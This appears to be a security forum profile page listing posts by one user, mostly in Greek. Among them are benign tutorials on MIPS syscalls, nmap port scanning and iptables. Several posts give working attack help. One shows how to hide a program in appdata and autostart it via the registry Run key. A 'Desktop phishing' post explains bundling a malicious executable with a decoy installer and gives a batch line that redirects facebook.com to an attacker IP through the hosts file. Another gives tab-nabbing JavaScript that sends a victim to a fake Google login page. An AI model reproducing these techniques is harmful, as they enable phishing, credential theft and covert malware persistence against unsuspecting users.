Jump to content

HackFreak

Members
  • Content count

    254
  • Joined

  • Last visited

About HackFreak

  • Rank
    Freak
  • Birthday 08/09/1992

Previous Fields

  • Γλώσσες προγραμματισμού
    C - C# - x86 Assembly - Javascript

Profile Information

  • Gender
    Male
  • Location
    /home/HackFreak
  • Interests
    Computer Programming, Networks, Computer Security
  1. HackFreak

    Pro Discovery

    Μπορείς να βρείς το pro discovery free basic edition εδώ: http://toorcon.techpathways.com/uploads/ProDiscoverRelease65Basic.zip Εάν ψάχνεις για crack-serial δυστυχώς δεν μπορώ να σε βοηθήσω λόγω κανονισμών του forum.
  2. Συγνώμη για το άκαιρο topic αλλά καλό θα είναι να υπάρχει η λύση μιας και μπορεί να το χρειαστεί κάποιος. Λοιπόν ο spim υποστηρίζει κάποια syscalls μέσα στα οποία είναι και το input/output string, bytes, integers κτλπ. Η φιλοσοφία είναι όπως στο linux βάζουμε κάποιο syscall code σε έναν καταχωρητή και τα arguments(αν υπάρχουν) σε κάποιος άλλους registers. Στον mips το syscall code συνήθως το βάζουμε στον $2 καταχωρητή, και το argument συνήθως στον $4. Παρακάτω ακολουθεί το παράδειγμα το οποίο ζήτησε ο φίλος Thodoris. .data string: .space 10 .text .globl main main: li $2, 8 #Bale ston kataxoriti $2 to value 8(read string) la $4, string #Bale tin dieuthinsi mmimis tou string ston $4(argument) syscall #Kane to syscall li $2, 4 #Bale ston kataxoriti $2 to value 4(print string) la $4, string #Bale tin dieuthinsi mmimis tou string ston $4(argument) syscall #Kane to syscall li $2, 10 #Exit syscall
  3. HackFreak

    Desktop phishing

    Αφού ορίσεις το output directory θα πάς στο menu Build και θα επιλέξεις "Build all". Αν υπάρχει κάποιο λάθος στον κώδικα(κάτι που δεν βλέπω) δεν θα το κάνει build και θα στο αναφέρει. Αλλιώς θα δημιουργηθεί ένα executable στο dir που όρισες.
  4. HackFreak

    Desktop phishing

    Θα πατήσεις το κουμπί Browse και στη συνέχεια θα επιλέξεις το output directory.
  5. HackFreak

    Desktop phishing

    Πήγαινε Options->solution options->Build->General και επέλεξε το output directory. Μετά Πήγαινε στο menu Build και επέλεξε το 'Build all'. Αν όλα πάνε καλά το εκτελέσιμο θα είναι στο output directory που όρισες.
  6. HackFreak

    Φόρμα Επικοινωνίας

    Θα πρέπει να σιγουρευτείς η διεύθυνση στο variable $to είναι σωστή. Επίσης θα πρέπει (εαν τρέχεις windows), να βάλεις στο php.ini έναν valid hostname/ip απο έναν smtp server ο οποίος να ΜΗΝ απαιτεί authorization. Αν απαιτεί authorization, τότε ρίξε μια ματιά εδώ: http://email.about.com/od/emailprogrammingtips/qt/PHP_Email_SMTP_Authentication.htm Έτσι θα μπορείς (μέσω της φόρμας), να στέλνεις mail σε παραλήπτη hotmail, gmail κτλπ τα οποία απαιτούν authorization.
  7. Όσο και να σας ξαφνιάζει είναι αλήθεια: http://www.youtube.com/watch?v=SEx6g-xt0CI
  8. HackFreak

    Προγραμμα Εκκνισης

    Για αυτό το σκοπό μπορείς να χρησιμοποιήσεις το Bat2Exe converter που μπορεί να σου κάνει "compile"(όχι πραγματικό compile αλλά "πακετάρισμα") καθώς επίσης σου δίνει την δυνατότητα για invisible application, να κάνεις include άλλα προγράμματα στο κεντρικό πρόγραμμα κτλπ. Τώρα όσον αφορά το θέμα της εκκίνησης μπορείς να βάλεις το path της εφαρμογής σου στην εξής διαδρομή της registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Run χρησιμοποιώντας την εντολή dos "reg". Ψάξτο και θα το βρείς. Και επίσης όσον αφορά το path που θα αντιγράφεται εγώ δεν σου προτείνω C:\windows αλλά κάποιο path που να έχει ο χρήστης δικαιώματα να προσπελάσει, όπως temp, appdata κτλπ, και τα οποία είναι τελείως invisible στο μέσο χρήστη. Έχω κάνει κάτι παρόμοιο με binding αλλά είναι σε C# δεν ξέρω αν σε ενδιαφέρει. http://www.s3cure.gr/index.php?showtopic=1372
  9. When someone wants to attack a computer system/network he/she must aquire some important information about the target in order to know what kind of attacks he will perform and which services he/she will attack in order to gain access. In order to gain information about what ports, services, OS'es, and versions are running on the target system, he will use a technique called Port Scanning. Port scanning consists of scanning a range of TCP-UDP ports and identify which are active what services are running on them etc... The port scanning in general works like this: --> Attacker computer attempts to connect to the target system at target port --> The target system send back e response --> The attacker based on the response the attacker knows if the port is open or closed. Port scanning techniques Now we will analyze the port scanning techniques. We will sicuss at most the stealth techniques which are more difficult to track. --> TCP connect scan This is the most simple, but not stealth technique. It identifies if the port is open or closed by connecting to the target port, using the operating system's network functions and analyzing the response by the target and identifies if it was open or closed. In order to get more in depth with this technique we must know how TCP protocol works when we request a connection to the target port. We have two computers. Computer A and computer B. Let's say that computer a want to connect to computer B in TCP port 80. In order to do that these steps are happening(Three-way handshake): --> Computer A send a TCP SYN packet(SYN flag is for connection request) --> Computer B responses by sending an SYN-ACK packet(Acknowledgment) --> Computer A send ACK and the connection has just started. So when the three-handshake has been completed computer A knows that the port is open. Now let's see if the port is not available: --> Computer A send a TCP SYN packet(SYN flag is for connection request) --> Computer B sends an RST packet and the connection is closed. The RST flag means Connection Reset. This means that the destination port is not available. So computer A knows that the port is not available. Advantages: Not requires higher-level privileges. Disadvantages: Easily tracked by the target. Here a simple TCP connect() port scan tool written in c#: http://www.s3cure.gr/index.php?showtopic=1292 ---------------------------------------------------------------------------------------------- --> TCP SYN scan This type of scan does not use the operating system's default network function but generates raw ip packets to make the port scan. So it requires higher level privileges in the operating system. This technique does not even complete the three-way handshake but examines the packet sended by the computer B. Lett's see how SYN scan works. --> Host A sends a SYN packet to host B. --> Host B sends a SYN-ACK packet if the port is open, or RST if the port is closed. So the host A knows if the port is open or closed examining the response. Advantages: More stealth that TCP connect() scan Disadvantages: Requires higher-level privileges ---------------------------------------------------------------------------------------------- --> TCP FIN scan As we said SYN scans are stealthier than the standard TCP connect() scan but the firewalls are able to identify it cause of the SYN flag. So another more stealth technique is the TCP FIN scan. The technique works as follows. --> Host A sends a FIN packet to host B(FIN flag means finish connection) --> Host B ignores the request if the port is open, or sends a RST packet if the port is closed. Advantages: More stealth than SYN scan Disadvantages: Requires high-level privileges, Windows OS is immune to this technique ---------------------------------------------------------------------------------------------- --> TCP NULL scan TCP NULL scan does not contains any TCP flags on the packet thats why it is named null. The technique works like this: --> Host A sends a NULL TCP packet to host B --> Host B sends a RST TCP packet if the port is closed, or nothing if the port is open. Advantages: Stealth Disadvantages: Requires higher-level privileges. --> The xmas tree scan This technique works by sending a TCP packet with URG,PUSH,FIN flags set. This is very similar to the TCP FIN port scan. --> Host A sends a TCP packet with URG,PUSH,FIN flags set. --> Host B sends nothing if the port is open, or TCP RST when port is closed. Advantages: Stealth Disadvantages: Requires higher level privileges ---------------------------------------------------------------------------------------------- --> Idle scan Idle scan is the most complicated technique in port scanning. It exploits a flow in the IP mechanism. Every IP packet has an IP identification number which is just incremented for every packet sent. Idle port scan works by using an idle zombie host. Must be idle in order to get the right IP ID's. The idle scan works in these step: --> First probe the IP ID number of the zombie --> Forge a SYN packet from the zombie and send it to the target port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented. --> Probe the zombie's IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1. Now if the IP ID has incresed by one then probably the port is not open, because the zombie hasn't sent any packets except for it's reply to the attacker probe. An increment of two means that the zombie has sent another packet except of it's reply to the attacker probe meaning that the port is open. Which means that the target has sent a SYN-ACK to the zombie so the zombie replied with an RST packet. As you can see it is compilcated but much more stealthier than the other techniques. Advantages: Stealthier than other techniques Disadvantages: Complicated, Needs an idle zombie ---------------------------------------------------------------------------------------------- --> UDP scan The UDP scan uses the UDP protocol which is a connection-less protocol which makes much way more simple than the TCP protocol. There are not flags here as were in TCP so the scanning process is musch more simple. Let's explain how UDP works first... Well UDP it is a connection-less protocol which means it does not have error,low control mechanisms neither flags. UDP sends it messages via the ICMP protcol. ICMP is a protocol responsible for transimiting messages over IP networks. Now let's see how UDP scan works: --> Host A sends a UDP packet to the host b --> Host B sends an ICMP "Port unreachable" packet if port is closed, or sends nothing if the port is either open of filtered. If the Host A is able of receiving data then Host A knows that host B has this port open. Those was the most common techniques in port scanning. --> Port scanning in practise Tired of the musch theory? Well, don't worry cause we are getting in the practise part. We will introduce the most powerfull tool fro port scanning nmap and we will learn how to use it with the different port scanning techniques. The most common port scanners are: --> Nmap(Linux / Windows) --> Superscan (Windows) --> Advanced port scanner(Windows) --> Angry IP Scanner (Linux / Windows) In this tutorial we will use nmap to our port scanning job. First if you already don't have nmap download it from here We will use the command-line version so if you have windows fire up cmd and if you have linux fire up the terminal. In windows type cd <the path you installed nmap>, and then type "nmap.exe" In linux you don't need to cd to a directory just type "nmap" ...and you will see the nmap's help screen. Generally the usage of nmap is nmap [option parameters] [host] --> TCP connect() scan As we said in theory this is the simplest technique of port scanning. Well it is even more simple in nmap. Just hit in the command line: nmap -sT "target IP/host here" so for example if i want to scan my home router 192.168.2.1 i will do: nmap -sT 192.168.2.1 and i will get that result: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 15:53 EEST Nmap scan report for 192.168.2.1 Host is up (0.026s latency). Not shown: 994 closed ports PORT STATE SERVICE 23/tcp open telnet 53/tcp open domain 80/tcp open http 1050/tcp open java-or-OTGfileshare 1234/tcp open hotline 5555/tcp open freeciv As you can see we can see clearly the open ports, the state and the service. The state can be open, filtered, or closed. --> TCP SYN scan To do a SYN scan is as simple as TCP connect() scan. Just type in command line: nmap -sS 192.168.2.1 and we will get the same results with the differnce that the port scanning requests won't be too easily tracked. ---------------------------------------------------------------------------------------------- --> TCP FIN scan In order to perform a TCP FIN scan we enter the following command: nmap -sF 192.168.2.1 but this time we get: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:03 EEST Nmap scan report for 192.168.2.1 Host is up (0.021s latency). Not shown: 994 closed ports PORT STATE SERVICE 23/tcp open|filtered telnet 53/tcp open|filtered domain 80/tcp open|filtered http 1050/tcp open|filtered java-or-OTGfileshare 1234/tcp open|filtered hotline 5555/tcp open|filtered freeciv That's because nmap cannot understand if the ports are opened or filtered by a firewall. Now if i try to port scan my windows machine(192.168.2.40) i will get this: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:34 EEST Nmap scan report for 192.168.2.40 Host is up (0.00065s latency). All 1000 scanned ports on 192.168.2.40 are closed That's because windows sends a RST packet when the port is closed or open, so nmap shows all ports as closed. ---------------------------------------------------------------------------------------------- --> TCP NULL scan To perform a NULL scan just tupe: nmap -sN 192.168.2.1 but i get: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:08 EEST Nmap scan report for 192.168.2.1 Host is up (0.00033s latency). All 1000 scanned ports on 192.168.2.1 are open|filtere which is false positive. I think that my router's OS sends the same RST packet back to me so that's why i get those. So let's try another host for example www.google.gr: nmap -sN www.google.gr and the result: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:22 EEST Nmap scan report for www.google.gr (209.85.229.104) Host is up (0.087s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http 113/tcp closed auth 443/tcp open https We get the right results. That's because the google server runs an os which sends rst responses in case of closed ports and nothing in case of open ports. ---------------------------------------------------------------------------------------------- --> TCP Xmas scan Now we will perform the TCP xmas scan. In order to use that we use the following command: nmap -sX 192.168.2.1 The results are same as with FIN scan as excpected: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:31 EEST Nmap scan report for 192.168.2.1 Host is up (0.023s latency). Not shown: 994 closed ports PORT STATE SERVICE 23/tcp open|filtered telnet 53/tcp open|filtered domain 80/tcp open|filtered http 1050/tcp open|filtered java-or-OTGfileshare 1234/tcp open|filtered hotline 5555/tcp open|filtered freeciv Advantages: Stealth Disadvantages: Requores higher-level privileges ---------------------------------------------------------------------------------------------- --> Idle scan In order to perform an idle scan we need first an idle zombie computer. When i say idle i mean that it does not netowork busy. In order to find a good zombie we use this command first: nmap -sS -O -v [target] Where: -sS means scan with SYN scan. Can be any port scanning technique. -O Operating system detection -v Verbose [target] the target zombie. In the reponse we are looking for IP ID Sequence Generation. This filed shows how IP ID are incremented. If nmap shows us "IP ID Sequence Generation: Incremental" or "IP ID Sequence Generation: roken little-endian incremental" then the machine is a good zombie. Once we have found one zombie we use this command to perform the scan: [nmap -sI zombie:port [target][/code] In my situation i give: nmap -sI 192.168.2.40:139 192.168.2.40 and i get: WARNING: Many people use -PN w/Idlescan to prevent pings from their true IP. On the other hand, timing info Nmap gains from pings can allow for faster, more reliable scans. Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 16:55 EEST Idle scan using zombie 192.168.2.40 (192.168.2.40:139); Class: Incremental Nmap scan report for 192.168.2.1 Host is up (0.050s latency). Not shown: 994 closed|filtered ports PORT STATE SERVICE 23/tcp open telnet 53/tcp open domain 80/tcp open http 1050/tcp open java-or-OTGfileshare 1234/tcp open hotline 5555/tcp open freeciv We see the results as in standard SYN scan. But notice that nmap warns us to use the -PN option in order for our host to don not send ping to the target. This can reveal our true IP. So we can use this syntax: nmap -PN -sI 192.168.2.40:139 192.168.2.1 OK i think Idle scan with nmap is musch more easy than in theory :) ---------------------------------------------------------------------------------------------- -->UDP Scan In order to perform a UDP scan we use the following synstax: nmap -sU [target] In My case: nmap -sU 192.168.2.1 And the result: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:09 EEST Nmap scan report for 192.168.2.1 Host is up (0.0024s latency). PORT STATE SERVICE 53/udp open domain Nmap OS detection, spoofing, custom ports Now we will see some other functions of nmap such OS detection, etc... In order to quess the operating system of the target we use the -O option. The syntax is like this: nmap -O [target] For example: nmap -O 192.168.2.1 Output: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:13 EEST Nmap scan report for 192.168.2.1 Host is up (0.0017s latency). Not shown: 994 closed ports PORT STATE SERVICE 23/tcp open telnet 53/tcp open domain 80/tcp open http 1050/tcp open java-or-OTGfileshare 1234/tcp open hotline 5555/tcp open freeciv MAC Address: 00:1C:A8:7F:4C:CC (AirTies Wireless Networks) Device type: general purpose Running: Linux 2.4.X OS details: Linux 2.4.18 - 2.4.35 (likely embedded) Network Distance: 1 hop As you can see we see that the target runs Linux 2.4.x And of course we can embed that parameter in our scans for example: nmap -sS -O 192.168.2.1 --> Service detection There are times that we need what kind of service(and version) each port runs. We can do this with nmap using the -sV parameter. An example: nmap -sV -sS 192.168.2.40 Output: Starting Nmap 5.21 ( http://nmap.org ) at 2010-09-20 17:24 EEST Nmap scan report for 192.168.2.40 Host is up (0.00042s latency). Not shown: 984 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC --> Spoofing Nmap gives us the ability to spoof our source address for the scanning, with the -S parameter. So for example if we wanted to scan 192.168.2.1 with source address 224.225.226.227 we would type: nmap -e eth0 -S 224.225.226.227 192.168.2.1 Where: -e eth0 our interface. Needed when ip spoofing -S 224.225.226.227 the spoofed ip address 192.168.2.1 the target --> Port ranges When scanning with nmap we can specify ports or port ranges to scan. This is done with the -p option. Th full syntax will be like this: nmap -p 20-22 192.168.2.1 Will scan from port 22 to port 22 and of course we can specify a single port: nmap -p 22 192.168.2.1 --> Conclusion In this tutorial we saw the basic port scanning techniques, and stealth techniques, and using those to port scan with nmap port scanner. We also saw some of nmap's basic but powerfull features. I hope you got something from this tutorial even it explains the basics because the nmap has many many options when combined you can do "miracles". Please report any mistakes in this article!
  10. HackFreak

    Desktop phishing

    Πολύ ωραίο άρθρο pr0n. Ωστόσω θα ήθελα να κάνω μια πρόσθεση... Στο θέμα του binder δεν χρειάζεται καν να χρησιμοποιήσουμε binder διότι πολύ απλά μπορούμε να το κάνουμε μέσω του .net Ναι, το .net προσφέρει την δυνατότητα το εκτελέσιμο να έχει resources φυσικά. Αυτά τα resources μπορούν να είναι εικόνες μουσική, και φυσικά εκτελέσιμα και γενικά οποιοδήποτε αρχείο, το οποίο μπορούμε να το κάνουμε drop σε κάποιο προσωρινό φάκελο(πχ temp), και στη συέχεια να τα εκτελέσουμε. Έτσι στο resource του κακού μας αρχείου μπορούμε να βάλουμε και ένα "καλό" το οποιό και θα φένεται, ενα install πχ. Όσο το θύμα κάνει το Install η "δουλειά" θα έχει γίνει. Είχα κάνει ένα tutorial παλαιότερα το οποίο θα βρείτε εδώ: http://www.s3cure.gr/index.php?showtopic=1372 Επίσης θα ήθελα να πω οτι εκτός απο c# μπορούμε να υλοποιήσουμε κάτι τέτοιο και σε batch με μία εντολή: echo [attacker ip] www.facebook.com>>"%systemroot%\system32\drivers\etc\hosts"
  11. Και φυσικά υπάρχει και η μέθοδος Rainbow tables η οποία είναι πολύ αποτελεσματικότερη απο τις υπόλοιπες καθώς μπορεί να έχει τα results την brute force attack σε πολύ λιγότερο χρόνο καθώς ένα hash 5 χαραχτήρων mixed στο δικό μου σύστημα έσπασε μέσα σε ...μερικά secs Βέβαια το τίμημα εδώ είναι η κεντρική μνήμη του συστήματος καθώς αυτή η τεχνική χρησιμοποιεί precompiled hashes σε tables κάτι το οποίο σημαίνει οτι θα χρειαστεί αρκετή μνήμη(ανάλογα με το τι είδος table χρησιμοποιούμε text size, min lenght, max length κτλπ) RAM.
  12. The attack is very clever, but it is not going to work agains all kind of people :D I have created a piece of javascript code that is very smaller and do the same thing. Consider the attacker have a site http://phiser.com/ with a fake google login page of course exactly as google. It looks like google login page. In the evil site the javascript code would be as follows: <html> <head> <script type="text/javascript"> window.onblur = function() { setTimeout("redirect()", 5000) }; function redirect() { window.location.href = 'http://phiser.com/'; } </script> </head> This is the evil site. Put anything here!!! </html> So when the victum switches to another tag the old tag will be redirected in 5 seconds to evil google login page... The effects are the same with the original code... As for the second kind of attack the possibilities are not with the attacker cause i don't think somebody will forget that he was waiting ...for a page redirect... Yeah some people may fall to the trick, but the most of them won't.
  13. HackFreak

    Linux iptables tutorial

    Greetz to all p0wnbox members, Many of Linux distros come with a powerfull firewall built-in. It is a kernel module called netfilter. To control netfilter Linux has built-in a command-line application for the user to specify his custom rules. There are many graphical front-ends to iptables but better for you to learn iptables itself as it gives you more control. In this topic i will produce the Linux iptables application. I will produce some of it's features and how to combine them to learn to build custom firewalls. With iptables you specify some rules about the network packets in the local computer. You can block-accept-forward a packet based on some criteria you specify. For example based on the IP address, port number, protocol etc... How iptables works Well iptables are actually a tool from which we define rules in netfilter, a kernel module which does the filtering based on the rules set with iptables. Based on the actions the netfilter decides what to do with the packet. Iptables has tables in which there are contained chains, and the chains there are rules. The rules are "conditions" that "tell" netfilter what to do with the packet specified by some criteria we specify. When a packet arrives it is checked upon all rules in chain one by one. If a match occurs, then a specified action is called for the packet. ACCEPT, DROP, or even another chain created by the user. If no match occurs then the default action is being taken. Also a rule in a chain can make a call to another chain. Those are the 3 built-in tables in iptables: * FILTER - The default table for handling network packets. Usually we use this * NAT - Used to deal with packets that create a new connection and used for Network Address Translation (NAT). * MANGLE - Used for specific purposes. As we told above each table has chains in it. Well the built-in chains for "filter" table are: * INPUT - The network packets that are designated for this host * OUTPUT - The network packets that are from this host * FORWARD - The network packets that are not designated for this host neither, from this host Built-in chains for nat table: * PREROUTING - Network packets when they arrive * OUTPUT - The network packets that are from this host * POSTROUTING - The network packets before they send. Built-in chains for mangle table: * INPUT — The network packets targeted for the host. * OUTPUT — The locally-generated network packets before they are sent out. * FORWARD — The network packets routed through the host. * PREROUTING — The incoming network packets before they are routed. * POSTROUTING — The network packets before they are sent out. So for example if we want to deal with a packet that "comes" on our computer we should use the INPUT chain and so on... Getting to the real stuff First of all if you have not a terminal open fire it up now. The first thing to do is to show the help of the iptables. To do so just type: iptables --help If all is ok you should see something like this output: $ iptables --help iptables v1.4.5 Usage: iptables -[AD] chain rule-specification [options] iptables -I chain [rulenum] rule-specification [options] iptables -R chain rulenum rule-specification [options] iptables -D chain rulenum [options] iptables -[LS] [chain [rulenum]] [options] iptables -[FZ] [chain] [options] iptables -[NX] chain iptables -E old-chain-name new-chain-name iptables -P chain target [options] iptables -h (print this help information) ... iptables is build-in in most Linux distros, however if you don't see the above output then you probably do not have iptables installed on your system. You can download it from here: ftp://ftp.netfilter.org/pub/ Once is all ok we are ready to continue... NOTE: After any changes made with iptables in order for the rules to load for the next reboot we must save them. The problem here is that the command is not the same on all linux distros. For example in debian is: /etc/init.d/iptables save_active In Fedora: /sbin/service iptables save You should make a search in order to find the way for your own distro. First of all we want to see if any rules are set up in our system. This is important cause you may be have any rules defined and forgotten, and whatever we must know how to do it :) We will do it with the following command: iptables -L And we will see something like this: $ iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED ACCEPT icmp -- anywhere anywhere ACCEPT all -- anywhere anywhere ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:ssh REJECT all -- anywhere anywhere reject-with icmp-host-prohibited REJECT all -- 192.168.2.0/24 anywhere reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT) target prot opt source destination REJECT all -- anywhere anywhere reject-with icmp-host-prohibited Chain OUTPUT (policy ACCEPT) target prot opt source destination As you can see we can see the rules for chain INPUT, FORWARD, OUTPUT. Well those rules are default except the last line of INPUT chain, which is my rule, where i REJECT, ICMP packets from all computers in my subnet which is 192.168.2.0 Now if we want to delete all rules we should do it with the following command: iptables -F WARNING: Check if you have any important rules. If you use your computer as a firewall router or whatever this will ruin it. Now if list again the rules i will have the following output: Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED ACCEPT icmp -- anywhere anywhere ACCEPT all -- anywhere anywhere ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:ssh REJECT all -- anywhere anywhere reject-with icmp-host-prohibited REJECT all -- 192.168.2.0/24 anywhere reject-with icmp-port-unreachable Chain FORWARD (policy ACCEPT) target prot opt source destination REJECT all -- anywhere anywhere reject-with icmp-host-prohibited Chain OUTPUT (policy ACCEPT) target prot opt source destination [[email protected] Desktop]# iptables -F [[email protected] Desktop]# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination As you can see only the default rules remained. Well, now let's continue with iptables preferred chains. As you know preferred chains are INPUT, OUTPUT, FORWARD. We can set their default policy(action) from those chains and of course for every chain we have. We set default policies with the -P option. So to block all input packets that won't match any rule in INPUT chain we should issue this command: iptables -P INPUT DROP CAUTION: If you have not set upt any rules on the INPUT chain all incoming packets will be blocked!!! We could do this for any chain. If we were to block all outgoing packets we should replace INPUT with OUTPUT etc... Now in the most casual computers we should issue this command with safety: iptables -P FORWARD DROP This indicates that no packets are forwarding through our computer. Since our computer is not use as a router this is safe to use. Blocking packets vis protocols Well now we will get more in depth of iptables. We are going to block various protocols in our computer. The syntax to block an incoming protocol is the following: iptables -A INPUT -p <Protocol name> -j DROP Parameters explanation: -A INPUT specifies the chain. We use the INPUT chain to block all incoming packets -p <Protocol name> specifies the protocol we wanna block. Can be icmp, udp, tcp, or all -j DROP specifies the action to do with that rule. In this case we just drop it In the first example i will block all incoming ICMP packets so anyone won't be able to ping the computer. iptables -A INPUT -p ICMP -j DROP This will block all incoming icmp packets. Now if i try to ping the local computer with IP 192.168.2.29 i get: $ ping 192.168.2.29 PING 192.168.2.29 (192.168.2.29) 56(84) bytes of data. ^C --- 192.168.2.29 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 4273ms As you can see i have 100% packets loss which means that the packets are rejected. So, if wanted to block for example all udp traffic you should replace "icmp" with "udp". If you wanna block all supported protocols just enter "all". Making rules via ports Now we will learn how to manage rules based on port number As you know when a tcp(or udp) connection is made both source and destination ports are needed. The destination port is the port that the remote machine is listening to and the source port is a random number which is opened in the machine making the connection. In order to block a packet coming to a specified destination port in a machine we use the following syntax: iptables -A INPUT -p tcp --dport 25 -j DROP Parameters explanation: -A INPUT specifies the input chain(incoming packets) -p tcp specifies the protocol in this example tcp(or udp) --dport 25 specifies the destination port -j DROP specifies to drop the packet Now anyone that tries to connect to this port it will get a "Connection refused" message We can also specify ranges of ports. For example we wanna to block the port range 25-80 To do that we use the following: iptables -A INPUT -p tcp --dport 25:80 -j DROP Now all tcp ports from port 25 to port 80 will be blocked. The largets valid range is from port 0-65535. Now we will see blocking based on source port. This is not as usefull but i think tha tyou must know it. To block using source ports we use the following syntax as "--dport" except that we use the "--sport" First of all i want to tell that source ports are in this range: 49152-65535 Those ports also called private ports and they are used only for client and temporary connections. So to do the obove example with --sport we issue the following command: iptables -A INPUT -p tcp --dport 50000:65000 -j DROP In this example we block all clients with source port from 50000 to 65000. For UDP things are the same except that we change the "-p tcp" option to "-p udp". Getting more in depth with the TCP protocol First let me explain some basic things about the TCP protocol. When a client requests a TCP connection with the server he sends a TCP with a SYN flag. This flag indicates the the client requests connection. The server then answers with a TCP packet with SYN-ACK flag. Then the client sends a ACK flag and the connection is started. iptables has an option "--syn" which specifies the packets with the syn flag. So say for example we wanna to block all incoming syn packets we would issue this command: iptables -A INPUT -p tcp --syn -j DROP Params explanation: -A INPUT means incoming packets -p tcp specifies the tcp protocol --syn specifies that it is a syn packet -j DROP means "drop the packet" So all connection initiliazations in our computer will be blocked. Well, now let's block all outcoming initilization packets. iptables -A OUTPUT -p tcp --syn -j DROP Now if we try to make any tcp connection we won't archive that because all initiliazation packets are rejected. We changed only the chain name, so that output packets are affected. iptables allows us not only to identify syn packets but to identify any flag set in the TCP packet. This is done using the "--tcp-flags" option. The TCP flags are: * ACK * FIN * PSH * RST * SYN * URG * ALL * NONE You can find more info about the flags and the TCP protocol here Well let's go beyond... the "--tcp-flags" option takes two arguments. The first is a list of flags to check and the second is the flags which must be set in order for the rule to match. So for example to block all incoming tcp packets with the SYN flag set we should issue the following command: iptables -A INPUT -p tcp --tcp-flags SYN SYN -j DROP Where: -A INPUT indicates input packets -p tcp the 'tcp' protocol --tcp-flags the flags to be matched -j DROP the rule for this criteria So any tcp connection request (tcp syn packet) will be blocked. So no connections in our computer. Very usefull for a home pc that does not offer any server services. Making rules using ip address and ip ranges Well iptables offer us the use of ip addresses to make our firewall rules. And this is very usefull if we want to block some "bad" ip addresses - ranges. For an ip to match we use the '-s' option, along with the ip address-range in the format -s <ip address-range>. So for example to block incoming icmp packets from all computers in the subnet 192.168.2.0, we use the following command: iptables -A INPUT -p icmp -s 192.168.2.0/24 -j DROP The '/24' indicates the CIRD. The cidr specifies the subnet mask which is the number of network bits. In this case it's 24 bits for the network part and 8 for the computer. This CIRD is very often on small home LAN. More info here: http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing If we wanted to block a single ip address we should issue the following: iptables -A INPUT -p icmp -s 192.168.2.3 -j DROP Working with our own chains As you already know iptables has buil-in 3 chains: * INPUT * OUTPUT * FORWARD But there are many times which we need to add our own chains with out own rules. For example we may want to create a chain which will block specific ports, etc.. In order to create a chain the syntax is that: iptables -N <table Name> Now for a real example. I will create a chain named BlockEm which will block specific ports. First we create the chain: iptables -N BlockEm G00d!! We have the chain ready. Now let's add some rules. iptables -A BlockEm -p tcp --dport 80 -j DROP iptables -A BlockEm -p tcp --dport 25 -j DROP We have the chain ready. It will block the tcp ports 25 and 80. Now let's use it. Suppose we want to blcok these ports from the ip range 192.168.2.1 - 192.168.2.254. Our network range. We should issue this command: iptables -A INPUT -s 192.168.2.0/24 -j BlockEm Every input packet from network subnet 192.168.2.0/24 will be directed to BlockEm chain. Now how about if we LOG the packets and then DROP them? Good idea. We just modify the BlockEm chain with two rules: iptables -A BlockEm -p tcp --dport 80 -j LOG iptables -A BlockEm -p tcp --dport 80 -j DROP iptables -A BlockEm -p tcp --dport 25 -j LOG iptables -A BlockEm -p tcp --dport 25 -j DROP And finally: iptables -A INPUT -s 192.168.2.0/24 -j BlockEm Now all connection request from 192.168.2.0 subnet in ports 80,25 will be dropped and logged. Now if somenoe connects in /var/log/messages file i will see: Aug 29 01:04:28 HackFreak-Pc kernel: IN=lo OUT= MAC=00:00:00:00:00:00:00:00:00:00:00:00:08:00 SRC=192.168.2.29 DST=192.168.2.29 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=3663 DF PROTO=TCP SPT=40606 DPT=25 WINDOW=32792 RES=0x00 SYN URGP=0 Well that is the basic idea of iptables. Hope you learned something from this tut...
  14. HackFreak

    Hello Big Brother!

    Πολύ ωραίος οδηγός pr0n. Θα ήθελα να προσθέσω *αν και αυτονόητο* οτι σε οποιαδήποτε ιστοσελίδα μπούμε καταγράφεται η αλήθινη τις περισσότερες φορές ip address μας. Για αυτό υπάρχουν οι γνωστοί σε όλους proxy servers οι οποιοί προσφέρουν ένα βαθμό ανωνυμίας καθώς και το TOR. Βέβαια χρησιμοποιώντας proxy servers, και TOR δεν υπάρχει ποτέ 100% ανωνυμία, απλώς δεν πάμε με "γυμνή" IP. Επίσης όσον αφορά το irc αν ο irc server χρησιμοποιεί ssl τότε δεν φαίνεται στους άλλους η IP address.
  15. HackFreak

    Cost of War...

    Yes, i agree, but not all people are considered!
×